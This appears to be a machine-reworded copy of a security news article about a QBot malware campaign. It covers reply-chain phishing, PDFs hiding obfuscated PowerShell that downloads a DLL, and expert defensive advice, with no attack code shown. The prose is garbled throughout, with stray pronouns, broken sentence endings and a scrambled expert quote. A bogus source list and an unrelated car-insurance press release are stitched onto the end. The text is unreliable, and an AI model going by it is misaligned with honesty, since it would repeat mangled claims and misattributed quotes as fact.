



A recent spike in QBot Trojan attacks has been observed, spreading via malicious emails written in various languages, including English, German, Italian, and French. The email is crafted using a genuine business letter obtained by the attacker and prompts the recipient to open her attached PDF file.

According to Kaspersky’s analysis this week, the campaign also uses a method of using reply chain emails to make it more difficult for would-be victims to flag it as malicious. As the name suggests, reply chaining is a technique for accessing and replying to existing email exchanges from a listserv (or anywhere else), ensuring that interloping messages are legitimate, unsuspicious, and authoritative. make it visible.

This campaign represents a shift in tactics for operators of QBot (aka QakBot or Pinkslipbot). This operator offers access as a service that other cybercriminals use to deliver various second stage malware to already compromised targets. First discovered in 2007, his QBot underwent numerous modifications and enhancements over the years to become one of the most actively distributed malware strains in 2020, widely distributed.

According to security researchers, these latest improvements increase stealthiness and legitimacy. For example, emails are crafted to modify only the minimum amount of stolen documents. It may contain links or attachments containing links to malicious sites.

“The messages were based on actual business letters obtained by the attackers, giving them the opportunity to participate in the communication thread with their own messages,” notes Kaspersky’s report.

QBot’s many layers of obfuscation

Regarding the attack flow, the PDF file contains a Windows Script File (WSF) containing an obfuscated PowerShell script encoded in Base64 lines. When the PowerShell script is secretly run on your computer, it uses the wget utility to retrieve the DLL files from the remote server. This file is used to deliver her QBot malware to the victim’s computer. This is an existing tactic. Last year, QBot operators began using her DLL sideloading to deliver malware. This is a technique to avoid detection by placing legitimate and malicious files in a common directory.

The group has recently stepped up its operations, improved its services, infected systems, installed attack frameworks, and sold access to other groups, including Black Basta.

“WSF is obfuscated to evade detection to download further payloads,” explains Timothy Morris, Chief Security Advisor at Tanium. “The use of attack ‘chains’ or multiple steps can help circumvent some protections, as the full context of malicious behavior cannot be observed as a single activity. ”

How to protect your business from QBot attacks

Morris said a variety of cybersecurity strategies are required to defend against multiple phases of the attack flow, from initial email to payload download to data exfiltration and theft.

“It’s important to have a defense-in-depth strategy that includes endpoint detection, monitoring, and protection technologies as well as modern web, network, and email security,” he says. “It’s also important to train users against these types of threats.”

Darren Guccione, CEO and co-founder of Keeper Security, says that unlike phishing attacks, which seem to come from random companies or governments, potential targets are malicious files containing malware that can be sent to someone by you. It states that it should be trained to recognize that it appears to be sent from We have exchanged emails in the past.

“Threat actors are trying to piggyback on your relationship and trust level to get these contacts to download files,” he explains. “Employees should avoid unsafe clicks. Do not click on suspicious links and do not install untrusted software.”

Other email security best practices include verifying the sender and content of emails before downloading attachments and hovering over embedded links to see the actual target URL. will be Defenders should also focus on ensuring that antivirus and antimalware solutions are up to date and deployed, and to keep endpoints such as PCs, servers, and routers protected and patched. there is.

According to Guccione, the recent resurgence of QBot and the addition of new modules and evasive techniques indicate that the malware is under active development, and companies should be prepared for the latest changes. there is.

“It’s a very capable adversarial tool that defenders need to defend against,” Guccione explains.

Sources 1/ https://Google.com/ 2/ https://www.darkreading.com/remote-workforce/qbot-initial-access-attack-malware-pdf-wsf-combo The mention sources can contact us to remove/changing this article

What Are The Main Benefits Of Comparing Car Insurance Quotes Online

LOS ANGELES, CA / ACCESSWIRE / June 24, 2020, / Compare-autoinsurance.Org has launched a new blog post that presents the main benefits of comparing multiple car insurance quotes. For more info and free online quotes, please visit https://compare-autoinsurance.Org/the-advantages-of-comparing-prices-with-car-insurance-quotes-online/ The modern society has numerous technological advantages. One important advantage is the speed at which information is sent and received. With the help of the internet, the shopping habits of many persons have drastically changed. The car insurance industry hasn't remained untouched by these changes. On the internet, drivers can compare insurance prices and find out which sellers have the best offers. View photos The advantages of comparing online car insurance quotes are the following: Online quotes can be obtained from anywhere and at any time. Unlike physical insurance agencies, websites don't have a specific schedule and they are available at any time. Drivers that have busy working schedules, can compare quotes from anywhere and at any time, even at midnight. Multiple choices. Almost all insurance providers, no matter if they are well-known brands or just local insurers, have an online presence. Online quotes will allow policyholders the chance to discover multiple insurance companies and check their prices. Drivers are no longer required to get quotes from just a few known insurance companies. Also, local and regional insurers can provide lower insurance rates for the same services. Accurate insurance estimates. Online quotes can only be accurate if the customers provide accurate and real info about their car models and driving history. Lying about past driving incidents can make the price estimates to be lower, but when dealing with an insurance company lying to them is useless. Usually, insurance companies will do research about a potential customer before granting him coverage. Online quotes can be sorted easily. Although drivers are recommended to not choose a policy just based on its price, drivers can easily sort quotes by insurance price. Using brokerage websites will allow drivers to get quotes from multiple insurers, thus making the comparison faster and easier. For additional info, money-saving tips, and free car insurance quotes, visit https://compare-autoinsurance.Org/ Compare-autoinsurance.Org is an online provider of life, home, health, and auto insurance quotes. This website is unique because it does not simply stick to one kind of insurance provider, but brings the clients the best deals from many different online insurance carriers. In this way, clients have access to offers from multiple carriers all in one place: this website. On this site, customers have access to quotes for insurance plans from various agencies, such as local or nationwide agencies, brand names insurance companies, etc. "Online quotes can easily help drivers obtain better car insurance deals. All they have to do is to complete an online form with accurate and real info, then compare prices", said Russell Rabichev, Marketing Director of Internet Marketing Company. CONTACT: Company Name: Internet Marketing CompanyPerson for contact Name: Gurgu CPhone Number: (818) 359-3898Email: cgurgu@internetmarketingcompany.BizWebsite: https://compare-autoinsurance.Org/ SOURCE: Compare-autoinsurance.Org View source version on accesswire.Com:https://www.Accesswire.Com/595055/What-Are-The-Main-Benefits-Of-Comparing-Car-Insurance-Quotes-Online View photos

Related